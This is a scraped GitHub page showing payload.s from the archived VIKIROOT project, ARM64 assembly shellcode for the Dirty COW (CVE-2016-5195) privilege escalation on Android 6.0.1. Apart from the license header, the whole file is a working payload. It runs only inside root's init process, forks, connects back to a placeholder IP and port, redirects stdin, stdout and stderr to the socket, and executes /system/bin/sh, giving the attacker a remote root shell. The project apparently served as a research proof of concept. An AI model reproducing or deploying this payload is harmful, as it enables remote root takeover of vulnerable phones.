This repository has been archived by the owner on Apr 2, 2019. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 96
/
payload.s
executable file
·173 lines (150 loc) · 4.36 KB
/
payload.s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
/*
* CVE-2016-5195 POC FOR ANDROID 6.0.1 MARSHMALLOW
*
* Heavily inspired by https://github.com/scumjr/dirtycow-vdso
*
* This file is part of VIKIROOT, https://github.com/hyln9/VIKIROOT
*
* Copyright (C) 2016-2017 Virgil Hou <virgil@zju.edu.cn>
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*/
.equ SYS_OPENAT, 0x38
.equ SYS_SOCKET, 0xc6
.equ SYS_CONNECT, 0xcb
.equ SYS_DUP3, 0x18
.equ SYS_CLONE, 0xdc
.equ SYS_EXECVE, 0xdd
.equ SYS_EXIT, 0x5d
.equ SYS_READLINKAT, 0x4e
.equ SYS_GETUID, 0xae
.equ SYS_GETPID, 0xac
.equ AF_INET, 0x2
.equ O_EXCL, 0x80
.equ O_CREAT, 0x40
.equ S_IRWXU, 0x1c0
.equ SOCK_STREAM, 0x1
.equ STDIN, 0x0
.equ STDOUT, 0x1
.equ STDERR, 0x2
.equ SIGCHLD, 0x11
.equ IP, 0xdeadc0de
.equ PORT, 0x1337
_start:
////////////////////////////////////////////////////////////////
//
// save registers
//
////////////////////////////////////////////////////////////////
stp x0, x1, [sp,#-16]!
////////////////////////////////////////////////////////////////
//
// target init(0)
// return if getuid() != 0 or getpid() !=1
//
////////////////////////////////////////////////////////////////
mov x8, SYS_GETUID
svc 0
cbnz w0, return
mov x8, SYS_GETPID
svc 0
cmp w0, 1
b.ne return
////////////////////////////////////////////////////////////////
//
// return if open("/data/local/tmp/.x", O_CREAT|O_EXCL, ?) fails
// use "openat" instead since "open" is deprecated
// intended to detect write permission and avoid conflict
//
////////////////////////////////////////////////////////////////
mov w0, 0 // dirfd is ignored
adr x1, path
mov w2, O_CREAT|O_EXCL
mov w3, S_IRWXU
mov x8, SYS_OPENAT
svc 0
cmn x0, #1, LSL#12
b.hi return
////////////////////////////////////////////////////////////////
//
// fork is deprecated, replaced with clone
//
////////////////////////////////////////////////////////////////
mov x0, SIGCHLD
mov x1, 0
mov x2, 0
mov x3, 0
mov x4, 0
mov x8, SYS_CLONE
svc 0
cbnz w0, return
////////////////////////////////////////////////////////////////
//
// reverse connect
//
////////////////////////////////////////////////////////////////
// sockfd = socket(AF_INET, SOCK_STREAM, 0)
mov x0, AF_INET
mov x1, SOCK_STREAM
mov x2, 0
mov x8, SYS_SOCKET
svc 0
mov x3, x0
// connect(sockfd, (struct sockaddr *)&server, sockaddr_len)
adr x1, sockaddr
mov x2, 0x10
mov x8, SYS_CONNECT
svc 0
cbnz w0, exit
// dup3(sockfd, STDIN, 0) ...
mov x0, x3
mov x2, 0
mov x1, STDIN
mov x8, SYS_DUP3
svc 0
mov x1, STDOUT
mov x8, SYS_DUP3
svc 0
mov x1, STDERR
mov x8, SYS_DUP3
svc 0
// execve('/system/bin/sh', NULL, NULL)
adr x0, shell
mov x2, 0
str x0, [sp, 0]
str x2, [sp, 8]
mov x1, sp
mov x8, SYS_EXECVE
svc 0
exit:
mov x0, 0
mov x8, SYS_EXIT
svc 0
return:
ldp x0, x1, [sp],#16
mov x17, x30
mov x30, x16
nop
nop
br x17
path:
.string "/data/local/tmp/.x"
.balign 4
sockaddr:
.short AF_INET
.short PORT
.word IP
shell:
.string "/system/bin/sh"